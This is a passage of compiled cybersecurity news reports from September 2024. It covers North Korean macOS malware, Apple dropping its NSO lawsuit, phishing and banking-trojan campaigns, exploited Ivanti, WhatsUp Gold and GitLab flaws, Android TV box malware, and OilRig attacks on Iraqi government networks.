The findings from Jamf are significant, not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also for the fact that the malware is written in Objective-C.
VisualStudioHelper is also designed to act as an information stealer by harvesting files specified in the configuration, but only after prompting the user to enter their system password by masquerading it as though it's originating from the Visual Studio app to avoid raising suspicion.
Both the payloads, however, operate as a backdoor and use two different servers for command-and-control (C2) communications.
"Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry," the researchers said. "It's important to train your employees, including your developers, to be hesitant to trust those who connect on social media and ask users to run software of any type.
"These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target."
Apple Drops Spyware Case Against NSO Group, Citing Risk of Threat Intelligence Exposure
16.9.24 OS The Hacker News
Apple has filed a motion to "voluntarily" dismiss its lawsuit against commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information.
The development was first reported by The Washington Post on Friday.
The iPhone maker said its efforts, coupled with those of others in the industry and national governments to tackle the rise of commercial spyware, have "substantially weakened" the defendants.
"At the same time, unfortunately, other malicious actors have arisen in the commercial spyware industry," the company said. "It is because of this combination of factors that Apple now seeks voluntary dismissal of this case."
"While Apple continues to believe in the merits of its claims, it has also determined that proceeding further with this case has the potential to put vital security information at risk."
Apple originally filed the lawsuit against the Israeli company in November 2021 in an attempt to hold it accountable for illegally targeting users with its Pegasus surveillance tool.
It described NSO Group, a subsidiary of Q Cyber Technologies Limited, as "amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse."
Earlier this January, a federal judge denied a motion from NSO Group to dismiss the lawsuit under the grounds that the company is "based in Israel and Apple should have sued them there," with the court stating that "the anti-hacking purpose of the [Computer Fraud and Abuse Act] fits Apple's allegations to a T, and NSO has not shown otherwise."
In its motion for voluntary dismissal, Apple said three major developments have been a contributing factor: The risk that the threat intelligence information it has developed to protect users against spyware attacks could be exposed, pointing to a July 25, 2024, report from The Guardian.
The British newspaper revealed that Israeli officials had seized documents from NSO Group in July 2020 in an apparent effort to stop the handover of information about the notorious hacking tool as part of the company's ongoing legal tussle with Meta-owned WhatsApp, which filed a similar lawsuit in 2019.
"The seizures were part of an unusual legal maneuver created by Israel to block the disclosure of information about Pegasus, which the government believed would cause 'serious diplomatic and security damage' to the country," The Guardian noted at the time.
Apple also cited as reasons the changing dynamics in the commercial spyware industry and the proliferation of different spyware companies, as well as the possibility of revealing to third-parties "the information Apple uses to defeat spyware while defendants and others create significant obstacles to obtaining an effective remedy."
The development comes as the Atlantic Council divulged that the individuals behind some of the spyware vendors in Israel, Italy, and India that have come under the scanner for enabling authoritarian regimes to spy on human rights advocates, opposition leaders, and journalists have sought to rename them, start new ones, or undertake strategic jurisdiction hopping.
Case in point, Intellexa, the now-sanctioned company behind the Predator spyware, has resurfaced with new infrastructure in connection with its ongoing use by likely customers in countries such as Angola, the Democratic Republic of the Congo (DRC), and Saudi Arabia.
"Predator's operators have significantly enhanced their infrastructure, adding layers of complexity to evade detection," cybersecurity company Recorded Future's Insikt Group said.
"The new infrastructure includes an additional tier in its multi-tiered delivery system, which anonymizes customer operations, making it even harder to identify which countries are using the spyware."
Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks
16.9.24 Phishing The Hacker News
Cybersecurity researchers have warned of ongoing phishing campaigns that abuse refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials.
"Unlike other phishing webpage distribution behavior through HTML content, these attacks use the response header sent by a server, which occurs before the processing of the HTML content," Palo Alto Networks Unit 42 researchers Yu Zhang, Zeyu You, and Wei Wang said.
"Malicious links direct the browser to automatically refresh or reload a web page immediately, without requiring user interaction."
Targets of the large-scale activity, observed between May and July 2024, include large corporations in South Korea, as well as government agencies and schools in the U.S. As many as 2,000 malicious URLs have been associated with the campaigns.
Over 36% of the attacks have singled out the business-and-economy sector, followed by financial services (12.9%), government (6.9%), health and medicine (5.7%), and computer and internet (5.4%).
The attacks are the latest in a long list of tactics that threat actors have employed to obfuscate their intent and trick email recipients into parting with sensitive information, including taking advantage of trending top-level domains (TLDs) and domain names to propagate phishing and redirection attacks.
The infection chains are characterized by the delivery of malicious links through header refresh URLs containing targeted recipients' email addresses. The link to which to be redirected is embedded in the Refresh response header.
The starting point of the infection chain is an email message containing a link that mimics a legitimate or compromised domain that, when clicked, triggers the redirection to the actor-controlled credential harvesting page.
To lend the phishing attempt a veneer of legitimacy, the malicious webmail login pages have the recipients' email addresses pre-filled. Attackers have also been observed using legitimate domains that offer URL shortening, tracking, and campaign marketing services.
"By carefully mimicking legitimate domains and redirecting victims to official sites, attackers can effectively mask their true objectives and increase the likelihood of successful credential theft," the researchers said.
"These tactics highlight the sophisticated strategies attackers use to avoid detection and exploit unsuspecting targets."
Phishing and business email compromise (BEC) continues to be a prominent pathway for adversaries looking to siphon information and perform financially motivated attacks.
BEC attacks have cost U.S. and international organizations an estimated $55.49 billion between October 2013 and December 2023, with over 305,000 scam incidents reported during the same time period, according to the U.S. Federal Bureau of Investigation (FBI).
The development comes amid "dozens of scam campaigns" that have leveraged deepfake videos featuring public figures, CEOs, news anchors, and top government officials to promote bogus investment schemes such as Quantum AI since at least July 2023.
These campaigns are propagated via posts and ads on various social media platforms, directing users to phony web pages that prompt them to fill out a form in order to sign up, after which a scammer contacts them via a phone call and asks them to pay an initial fee of $250 in order to access the service.
"The scammer instructs the victim to download a special app so that they can 'invest' more of their funds," Unit 42 researchers said. "Within the app, a dashboard appears to show small profits."
"Finally, when the victim tries to withdraw their funds, the scammers either demand withdrawal fees or cite some other reason (e.g., tax issues) for not being able to get their funds back.
"The scammers may then lock the victim out of their account and pocket the remaining funds, causing the victim to have lost the majority of the money that they put into the 'platform.'"
It also follows the discovery of a stealthy threat actor that presents itself as a legitimate enterprise and has been advertising automated CAPTCHA-solving services at scale to other cybercriminals and helping them infiltrate IT networks.
Dubbed Greasy Opal by Arkose Labs, the Czech Republic-based "cyber attack enablement business" is believed to have been operational since 2009, offering to customers a toolkit of sorts for credential stuffing, mass fake account creation, browser automation, and social media spam at a price point of $190 and an additional $10 for a monthly subscription.
The product portfolio runs the cybercrime gamut, allowing them to develop a sophisticated business model by packaging several services together. The entity's revenues for 2023 alone are said to be no less than $1.7 million.
"Greasy Opal employs cutting-edge OCR technology to effectively analyze and interpret text-based CAPTCHAs, even those distorted or obscured by noise, rotation, or occlusion," the fraud prevention company noted in a recent analysis. "The service develops machine-learning algorithms trained on extensive datasets of images."
One of its users is Storm-1152, a Vietnamese cybercrime group that was previously identified by Microsoft as selling 750 million fraudulent Microsoft accounts and tools through a network of bogus websites and social media pages to other criminal actors.
"Greasy Opal has built a thriving conglomerate of multi-faceted businesses, offering not only CAPTCHA-solving services but also SEO-boosting software and social media automation services that are often used for spam, which could be a precursor for malware delivery," Arkose Labs said.
"This threat actor group reflects a growing trend of businesses operating in a gray zone, while its products and services have been used for illegal activities downstream."
Ivanti Warns of Active Exploitation of Newly Patched Cloud Appliance Vulnerability
14.9.24 Exploit The Hacker News
Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild.
The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances.
"An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution," Ivanti noted in an advisory released earlier this week. "The attacker must have admin level privileges to exploit this vulnerability."
The flaw impacts Ivanti CSA 4.6, which has currently reached end-of-life status, requiring that customers upgrade to a supported version going forward. That said, it has been addressed in CSA 4.6 Patch 519.
"With the end-of-life status this is the last fix that Ivanti will backport for this version," the Utah-based IT software company added. "Customers must upgrade to Ivanti CSA 5.0 for continued support."
"CSA 5.0 is the only supported version and does not contain this vulnerability. Customers already running Ivanti CSA 5.0 do not need to take any additional action."
On Friday, Ivanti updated its advisory to note that it observed confirmed exploitation of the flaw in the wild targeting a "limited number of customers."
It did not reveal additional specifics related to the attacks or the identity of the threat actors weaponizing it, however, a number of other vulnerabilities in Ivanti products have been exploited as a zero-day by China-nexus cyberespionage groups.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 4, 2024.
The disclosure also comes as cybersecurity company Horizon3.ai posted a detailed technical analysis of a critical deserialization vulnerability (CVE-2024-29847, CVSS score: 10.0) impacting Endpoint Manager (EPM) that results in remote code execution.
Apple Vision Pro Vulnerability Exposed Virtual Keyboard Inputs to Attackers
14.9.24 Exploit The Hacker News
Details have emerged about a now-patched security flaw impacting Apple's Vision Pro mixed reality headset that, if successfully exploited, could allow malicious attackers to infer data entered on the device's virtual keyboard.
The attack, dubbed GAZEploit, has been assigned the CVE identifier CVE-2024-40865.
"A novel attack that can infer eye-related biometrics from the avatar image to reconstruct text entered via gaze-controlled typing," a group of academics from the University of Florida, CertiK Skyfall Team, and Texas Tech University said.
"The GAZEploit attack leverages the vulnerability inherent in gaze-controlled text entry when users share a virtual avatar."
Following responsible disclosure, Apple addressed the issue in visionOS 1.3 released on July 29, 2024. It described the vulnerability as impacting a component called Presence.
"Inputs to the virtual keyboard may be inferred from Persona," it said in a security advisory, adding it resolved the problem by "suspending Persona when the virtual keyboard is active."
In a nutshell, the researchers found that it was possible to analyze a virtual avatar's eye movements (or "gaze") to determine what the user wearing the headset was typing on the virtual keyboard, effectively compromising their privacy.
As a result, a threat actor could, hypothetically, analyze virtual avatars shared via video calls, online meeting apps, or live streaming platforms and remotely perform keystroke inference. This could then be exploited to extract sensitive information such as passwords.
The attack, in turn, is accomplished by means of a supervised learning model trained on Persona recordings, eye aspect ratio (EAR), and eye gaze estimation to differentiate between typing sessions and other VR-related activities (e.g., watching movies or playing games).
In the subsequent step, the gaze estimation directions on the virtual keyboard are mapped to specific keys in order to determine the potential keystrokes in a manner such that it also takes into account the keyboard's location in the virtual space.
"By remotely capturing and analyzing the virtual avatar video, an attacker can reconstruct the typed keys," the researchers said. "Notably, the GAZEploit attack is the first known attack in this domain that exploits leaked gaze information to remotely perform keystroke inference."
17-Year-Old Arrested in Connection with Cyber Attack Affecting Transport for London
14.9.24 Crime The Hacker News
British authorities on Thursday announced the arrest of a 17-year-old male in connection with a cyber attack affecting Transport for London (TfL).
"The 17-year-old male was detained on suspicion of Computer Misuse Act offenses in relation to the attack, which was launched on TfL on 1 September," the U.K. National Crime Agency (NCA) said.
The teenager, who's from Walsall, is said to have been arrested on September 5, 2024, following an investigation that was launched in the incident's aftermath.
The law enforcement agency said the unnamed individual was questioned and subsequently let go on bail.
"Attacks on public infrastructure such as this can be hugely disruptive and lead to severe consequences for local communities and national systems," Deputy Director Paul Foster, head of the NCA's National Cyber Crime Unit, said.
"The swift response by TfL following the incident has enabled us to act quickly, and we are grateful for their continued cooperation with our investigation, which remains ongoing."
TfL has since confirmed that the security breach has led to the unauthorized access of bank account numbers and sort codes for around 5,000 customers and that it will be directly contacting those impacted.
"Although there has been very little impact on our customers so far, the situation is evolving and our investigations have identified that certain customer data has been accessed," TfL said.
The London public transportation agency is also requiring around 30,000 members of its staff to complete an IT identity check by attending an appointment at a specified TfL location to reset their password and be verified in-person for access to TfL applications and data.
"This includes some customer names and contact details, including email addresses and home addresses where provided."
It's worth noting that West Midlands police previously arrested a 17-year-old boy, also from Walsall, in July 2024 in connection with a ransomware attack on MGM Resorts. The incident was attributed to the infamous Scattered Spider group.
It's currently not clear if these two events refer to the same individual. Back in June, another 22-year-old U.K. national was arrested in Spain for his alleged involvement in several ransomware attacks carried out by Scattered Spider.
The dangerous e-crime group is part of a larger collective called The Com, a loose-knit ecosystem of various groups that have engaged in cybercrime, squatting, and physical violence. It's also tracked as 0ktapus, Octo Tempest, and UNC3944.
According to a new report from EclecticIQ, Scattered Spider's ransomware operations have increasingly honed in on cloud infrastructures within the insurance and financial sectors, echoing a similar analysis from Resilience Threat Intelligence in May 2024.
The group has a well-documented history of gaining persistent access to cloud environments via sophisticated social engineering tactics, as well as purchasing stolen credentials, executing SIM swaps, and utilizing cloud-native tools.
"Scattered Spider frequently uses phone-based social engineering techniques like voice phishing (vishing) and text message phishing (smishing) to deceive and manipulate targets, mainly targeting IT service desks and identity administrators," security researcher Arda Büyükkaya said.
"The cybercriminal group abuses legitimate cloud tools such as Azure's Special Administration Console and Data Factory to remotely execute commands, transfer data, and maintain persistence while avoiding detection."
TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud
14.9.24 Virus The Hacker News
Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials.
"The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition, the application is installed through a dropper app that shares the same anti-analysis mechanisms."
"These features are designed to evade detection and hinder cybersecurity professionals' efforts to analyze and mitigate the malware."
TrickMo, first caught in the wild by CERT-Bund in September 2019, has a history of targeting Android devices, particularly targeting users in Germany to siphon one-time passwords (OTPs) and other two-factor authentication (2FA) codes to facilitate financial fraud.
The mobile-focused malware is assessed to be the work of the now-defunct TrickBot e-crime gang, over time continually improving its obfuscation and anti-analysis features to fly under the radar.
Notable among the features are its ability to record screen activity, log keystrokes, harvest photos and SMS messages, remotely control the infected device to conduct on-device fraud (ODF), and abuse Android's accessibility services API to carry out HTML overlay attacks as well as perform clicks and gestures on the device.
The malicious dropper app discovered by the Italian cybersecurity company masquerades as the Google Chrome web browser that, when launched after installation, urges the victim to update Google Play Services by clicking the Confirm button.
Should the user proceed with the update, an APK file containing the TrickMo payload is downloaded to the device under the guise of "Google Services," following which the user is asked to enable accessibility services for the new app.
"Accessibility services are designed to assist users with disabilities by providing alternative ways to interact with their devices," the researchers said. "However, when exploited by malicious apps like TrickMo, these services can grant extensive control over the device."
"This elevated permission allows TrickMo to perform various malicious actions, such as intercepting SMS messages, handling notifications to intercept or hide authentication codes, and executing HTML overlay attacks to steal user credentials. Additionally, the malware can dismiss keyguards and auto-accept permissions, enabling it to integrate seamlessly into the device's operations."
Furthermore, the abuse of the accessibility services allows the malware to disable crucial security features and system updates, auto-grant permissions at will, and prevent the uninstallation of certain apps.
Cleafy's analysis also uncovered misconfigurations in the command-and-control (C2) server that made it possible to access 12 GB worth of sensitive data exfiltrated from the devices, including credentials and pictures, without requiring any authentication.
The C2 server also hosts the HTML files used in the overlay attacks. These files encompass fake login pages for various services, counting banks such as ATB Mobile and Alpha Bank and cryptocurrency platforms like Binance.
The security lapse not only highlights the operational security (OPSEC) blunder on the part of the threat actors, but also puts the victims' data at risk of exploitation by other threat actors.
The wealth of information exposed from TrickMo's C2 infrastructure could be leveraged to commit identity theft, infiltrate various online accounts, conduct unauthorized fund transfers, and even make fraudulent purchases. Even worse, attackers could hijack the accounts and lock the victims out by resetting their passwords.
"Using personal information and images, the attacker can craft convincing messages that trick victims into divulging even more information or executing malicious actions," the researchers noted.
"Exploiting such comprehensive personal data results in immediate financial and reputational damage and long-term consequences for the victims, making recovery a complex and prolonged process."
The disclosure comes as Google has been plugging the security holes around sideloading to let third-party developers determine if their apps are sideloaded using the Play Integrity API and, if so, require users to download the apps from Google Play in order to continue using them.
Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw
14.9.24 Exploit The Hacker News
Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks.
The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who is also credited with discovering and reporting CVE-2024-6671 (CVSS scores: 9.8).
Both the critical vulnerabilities, which allow an unauthenticated attacker to retrieve a user's encrypted password, were patched by Progress in mid-August 2024.
"The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC's publication," Trend Micro researchers Hitomi Kimura and Maria Emreen Viray said in a Thursday analysis.
The attacks observed by the cybersecurity company involve bypassing WhatsUp Gold authentication to exploit the Active Monitor PowerShell Script and ultimately download various remote access tools for gaining persistence on the Windows host.
This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed by means of a single MSI installer file retrieved from a remote server.
"The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function," the researchers explained. "The threat actors in this case chose it to perform for remote arbitrary code execution."
While no follow-on exploitation actions have been detected, the use of several remote access software points to the involvement of a ransomware actor.
This is the second time security vulnerabilities in WhatsUp Gold have been actively weaponized in the wild. Early last month, the Shadowserver Foundation said it had observed exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug that was resolved by Progress in June 2024.
The disclosure comes weeks after Trend Micro also revealed that threat actors are exploiting a now-patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0) to deliver the Godzilla web shell.
"The CVE-2023-22527 vulnerability continues to be widely exploited by a wide range of threat actors who abuse this vulnerability to perform malicious activities, making it a significant security risk to organizations worldwide," the company said.
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency
14.9.24 Cryptocurrency The Hacker News
Cybersecurity researchers have uncovered a new malware campaign targeting Linux environments to conduct illicit cryptocurrency mining and deliver botnet malware.
The activity, which specifically singles out the Oracle Weblogic server, is designed to deliver a malware strain dubbed Hadooken, according to cloud security firm Aqua.
"When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," security researcher Assaf Moran said.
The attack chains exploit known security vulnerabilities and misconfigurations, such as weak credentials, to obtain an initial foothold and execute arbitrary code on susceptible instances.
This is accomplished by launching two nearly-identical payloads, one written in Python and the other, a shell script, both of which are responsible for retrieving the Hadooken malware from a remote server ("89.185.85[.]102" or "185.174.136[.]204").
"In addition, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers," Morag said.
"It then moves laterally across the organization or connected environments to further spread the Hadooken malware. "
Hadooken comes embedded with two components, a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet called Tsunami (aka Kaiten), which has a history of targeting Jenkins and Weblogic services deployed in Kubernetes clusters.
Furthermore, the malware is responsible for establishing persistence on the host by creating cron jobs to run the crypto miner periodically at varying frequencies.
Hadooken's defense evasion capabilities are realized through a combination of tactics that involve the use of Base64-encoded payloads, dropping the miner payloads under innocuous names like "bash" and "java" to blend in with legitimate processes, and artifact deletion after execution to hide any signs of malicious activity.
Aqua noted that the IP address 89.185.85[.]102 is registered in Germany under the hosting company Aeza International LTD (AS210644), with a previous report from Uptycs in February 2024 linking it to an 8220 Gang cryptocurrency campaign that abused flaws in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address 185.174.136[.]204, while currently inactive, is also linked to Aeza Group Ltd. (AS216246). As highlighted by Qurium and EU DisinfoLab in July 2024, Aeza is a bulletproof hosting service provider with a presence in Moscow M9 and in two data centers in Frankfurt.
"The modus operandi of Aeza and its fast growth can be explained by the recruitment of young developers affiliated to bulletproof hosting providers in Russia offering shelter to cybercrime," the researchers said in the report.
New Android Malware 'Ajina.Banker' Steals Financial Data and Bypasses 2FA via Telegram
13.9.24 Virus The Hacker News
Bank customers in the Central Asia region have been targeted by a new strain of Android malware codenamed Ajina.Banker since at least November 2023 with the goal of harvesting financial information and intercepting two-factor authentication (2FA) messages.
Singapore-headquartered Group-IB, which discovered the threat in May 2024, said the malware is propagated via a network of Telegram channels set up by the threat actors under the guise of legitimate applications related to banking, payment systems, and government services, or everyday utilities.
"The attacker has a network of affiliates motivated by financial gain, spreading Android banker malware that targets ordinary users," security researchers Boris Martynyuk, Pavel Naumov, and Anvar Anarkulov said.
Targets of the ongoing campaign include countries such as Armenia, Azerbaijan, Iceland, Kazakhstan, Kyrgyzstan, Pakistan, Russia, Tajikistan, Ukraine, and Uzbekistan.
There is evidence to suggest that some aspects of the Telegram-based malware distribution process may have been automated for improved efficiency. The numerous Telegram accounts are designed to serve crafted messages containing links -- either to other Telegram channels or external sources -- and APK files to unwitting targets.
The use of links pointing to Telegram channels that host the malicious files has an added benefit in that it bypasses security measures and restrictions imposed by many community chats, thereby allowing the accounts to evade bans when automatic moderation is triggered.
Besides abusing the trust users place in legitimate services to maximize infection rates, the modus operandi also involves sharing the malicious files in local Telegram chats by passing them off as giveaways and promotions that claim to offer lucrative rewards and exclusive access to services.
"The use of themed messages and localized promotion strategies proved to be particularly effective in regional community chats," the researchers said. "By tailoring their approach to the interests and needs of the local population, Ajina was able to significantly increase the likelihood of successful infections."
The threat actors have also been observed bombarding Telegram channels with several messages using multiple accounts, at times simultaneously, indicating a coordinated effort that likely employs some sort of an automated distribution tool.
The malware in itself is fairly straightforward in that, once installed, it establishes contact with a remote server and requests the victim to grant it permission to access SMS messages, phone number APIs, and current cellular network information, among others.
Ajina.Banker is capable of gathering SIM card information, a list of installed financial apps, and SMS messages, which are then exfiltrated to the server.
New versions of the malware are also engineered to serve phishing pages in an attempt to collect banking information. Furthermore, they can access call logs and contacts, as well as abuse Android's accessibility services API to prevent uninstallation and grant themselves additional permissions.
Google told The Hacker News that it did not find any evidence of the malware being propagated via the Google Play Store and that Android users are protected against the threat by Google Play Protect, which is on by default on Android devices with Google Play Services.
"The hiring of Java coders, created Telegram bot with the proposal of earning some money, also indicates that the tool is in the process of active development and has support of a network of affiliated employees," the researchers said.
"Analysis of the file names, sample distribution methods, and other activities of the attackers suggests a cultural familiarity with the region in which they operate."
The disclosure comes as Zimperium uncovered links between two Android malware families tracked as SpyNote and Gigabud (which is part of the GoldFactory family that also includes GoldDigger).
"Domains with really similar structure (using the same unusual keywords as subdomains) and targets used to spread Gigabud samples and were also used to distribute SpyNote samples," the company said. "This overlap in distribution shows that the same threat actor is likely behind both malware families, pointing to a well-coordinated and broad campaign."
Urgent: GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Job Execution
13.9.24 Vulnerebility The Hacker News
GitLab on Wednesday released security updates to address 17 security vulnerabilities, including a critical flaw that allows an attacker to run pipeline jobs as an arbitrary user.
The issue, tracked as CVE-2024-6678, carries a CVSS score of 9.9 out of a maximum of 10.0
"An issue was discovered in GitLab CE/EE affecting all versions starting from 8.14 prior to 17.1.7, starting from 17.2 prior to 17.2.5, and starting from 17.3 prior to 17.3.2, which allows an attacker to trigger a pipeline as an arbitrary user under certain circumstances," the company said in an alert.
The vulnerability, along with three high-severity, 11 medium-severity, and two low-severity bugs, have been addressed in versions 17.3.2, 17.2.5, 17.1.7 for GitLab Community Edition (CE) and Enterprise Edition (EE).
It's worth noting that CVE-2024-6678 is the fourth such flaw that GitLab has patched over the past year after CVE-2023-5009 (CVSS score: 9.6), CVE-2024-5655 (CVSS score: 9.6), and CVE-2024-6385 (CVSS score: 9.6).
While there is no evidence of active exploitation of the flaws, users are recommended to apply the patches as soon as possible to mitigate against potential threats.
Earlier this May, U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a critical GitLab vulnerability (CVE-2023-7028, CVSS score: 10.0) had come under active exploitation in the wild.
Beware: New Vo1d Malware Infects 1.3 Million Android-based TV Boxes Worldwide
13.9.24 Virus The Hacker News
Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).
"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus vendor Doctor Web said in a report published today.
A majority of the infections have been detected in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.
It's currently not known what the source of the infection is, although it's suspected that it may have either involved an instance of prior compromise that allows for gaining root privileges or the use of unofficial firmware versions with built-in root access.
The following TV models have been targeted as part of the campaign -
KJ-SMART4KVIP (Android 10.1; KJ-SMART4KVIP Build/NHG47K)
R4 (Android 7.1.2; R4 Build/NHG47K)
TV BOX (Android 12.1; TV BOX Build/NHG47K)
The attack entails the substitution of the "/system/bin/debuggerd" daemon file (with the original file moved to a backup file named "debuggerd_real"), as well as the introduction of two new files – "/system/xbin/vo1d" and "/system/xbin/wd" – which contain the malicious code and operate concurrently.
"Before Android 8.0, crashes were handled by the debuggerd and debuggerd64 daemons," Google notes in its Android documentation. "In Android 8.0 and higher, crash_dump32 and crash_dump64 are spawned as needed."
Two different files shipped as part of the Android operating system – install-recovery.sh and daemonsu – have been modified as part of the campaign to trigger the execution of the malware by starting the "wd" module.
"The trojan's authors probably tried to disguise one if its components as the system program '/system/bin/vold,' having called it by the similar-looking name 'vo1d' (substituting the lowercase letter 'l' with the number '1')," Doctor Web said.
The "vo1d" payload, in turn, starts "wd" and ensures it's persistently running, while also downloading and running executables when instructed by a command-and-control (C2) server. Furthermore, it keeps tabs on specified directories and installs the APK files that it finds in them.
"Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive," the company said.
Update#
Google told The Hacker News that the infected TV models were not Play Protect certified Android devices and likely used source code from the Android Open Source Project code repository. The company’s entire statement is as follows -
“These off-brand devices discovered to be infected were not Play Protect certified Android devices. If a device isn't Play Protect certified, Google doesn’t have a record of security and compatibility test results. Play Protect certified Android devices undergo extensive testing to ensure quality and user safety. To help you confirm whether or not a device is built with Android TV OS and Play Protect certified, our Android TV website provides the most up-to-date list of partners. You can also take these steps to check if your device is Play Protect certified. ”
Exposed Selenium Grid Servers Targeted for Crypto Mining and Proxyjacking
13.9.24 Cryptocurrency The Hacker News
Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns.
"Selenium Grid is a server that facilitates running test cases in parallel across different browsers and versions," Cado Security researchers Tara Gould and Nate Bill said in an analysis published today.
"However, Selenium Grid's default configuration lacks authentication, making it vulnerable to exploitation by threat actors."
The abuse of publicly-accessible Selenium Grid instances for deploying crypto miners was previously highlighted by cloud security firm Wiz in late July 2024 as part of an activity cluster dubbed SeleniumGreed.
Cado, which observed two different campaigns against its honeypot server, said the threat actors are exploiting the lack of authentication protections to carry out a diverse set of malicious actions.
The first of them leverages the "goog:chromeOptions" dictionary to inject a Base64-encoded Python script that, in turn, retrieves a script named "y," which is the open-source GSocket reverse shell.
The reverse shell subsequently serves as a medium for introducing the next-stage payload, a bash script named "pl" that retrieves IPRoyal Pawn and EarnFM from a remote server via curl and wget commands.
"IPRoyal Pawns is a residential proxy service that allows users to sell their internet bandwidth in exchange for money," Cado said.
"The user's internet connection is shared with the IPRoyal network with the service using the bandwidth as a residential proxy, making it available for various purposes, including for malicious purposes."
EarnFM is also a proxyware solution that's advertised as a "ground-breaking" way to "generate passive income online by simply sharing your internet connection."
The second attack, like the proxyjacking campaign, follows the same route to deliver a bash script via a Python script that checks if it's running on a 64-bit machine and then proceeds to drop a Golang-based ELF binary.
The ELF file subsequently attempts to escalate to root by leveraging the PwnKit flaw (CVE-2021-4043) and drops an XMRig cryptocurrency miner called perfcc.
"As many organizations rely on Selenium Grid for web browser testing, this campaign further highlights how misconfigured instances can be abused by threat actors," the researchers said. "Users should ensure authentication is configured, as it is not enabled by default."
Iranian Cyber Group OilRig Targets Iraqi Government in Sophisticated Malware Attack
13.9.24 APT The Hacker News
Iraqi government networks have emerged as the target of an "elaborate" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called OilRig.
The attacks singled out Iraqi organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis.
OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber group associated with the Iranian Ministry of Intelligence and Security (MOIS).
Active since at least 2014, the group has a track record of conducting phishing attacks in the Middle East to deliver a variety of custom backdoors such as Karkoff, Shark, Marlin, Saitama, MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah for information theft.
The latest campaign is no exception in that it involves the use of a new set of malware families dubbed Veaty and Spearal, which come with capabilities to execute PowerShell commands and harvest files of interest.
"The toolset used in this targeted campaign employs unique command-and-control (C2) mechanisms, including a custom DNS tunneling protocol, and a tailor-made email based C2 channel," Check Point said.
"The C2 channel uses compromised email accounts within the targeted organization, indicating that the threat actor successfully infiltrated the victim's networks."
Some of the actions that the threat actor took in executing the attack, and following it, were consistent with tactics, techniques, and procedures (TTPs) that OilRig has employed when carrying out similar operations in the past.
This includes the use of email-based C2 channels, specifically leveraging previously compromised email mailboxes to issue commands and exfiltrate data. This modus operandi has been common to several backdoors such as Karkoff, MrPerfectionManager, and PowerExchange.
The attack chain is kicked off via deceptive files masquerading as benign documents ("Avamer.pdf.exe" or "IraqiDoc.docx.rar") that, when launched, pave the way for the deployment of Veaty and Spearal. The infection pathway is likely said to have involved an element of social engineering.
The files initiate the execution of intermediate PowerShell or Pyinstaller scripts that, in turn, drop the malware executables and their XML-based configuration files, which include information about the C2 server.
"The Spearal malware is a .NET backdoor that utilizes DNS tunneling for [C2] communication," Check Point said. "The data transferred between the malware and the C2 server is encoded in the subdomains of DNS queries using a custom Base32 scheme."
Spearal is designed to execute PowerShell commands, read file contents and send it in the form of Base32-encoded data, and retrieve data from the C2 server and write it to a file on the system.
Also written .NET, Veaty leverages emails for C2 communications with the end goal of downloading files and executing commands via specific mailboxes belonging to the gov-iq.net domain. The commands allow it to upload/download files and run PowerShell scripts.
Check Point said its analysis of the threat actor infrastructure led to the discovery of a different XML configuration file that's likely associated with a third SSH tunneling backdoor.
It further identified an HTTP-based backdoor, CacheHttp.dll, that targets Microsoft's Internet Information Services (IIS) servers and examines incoming web requests for "OnGlobalPreBeginRequest" events and executes commands when they occur.
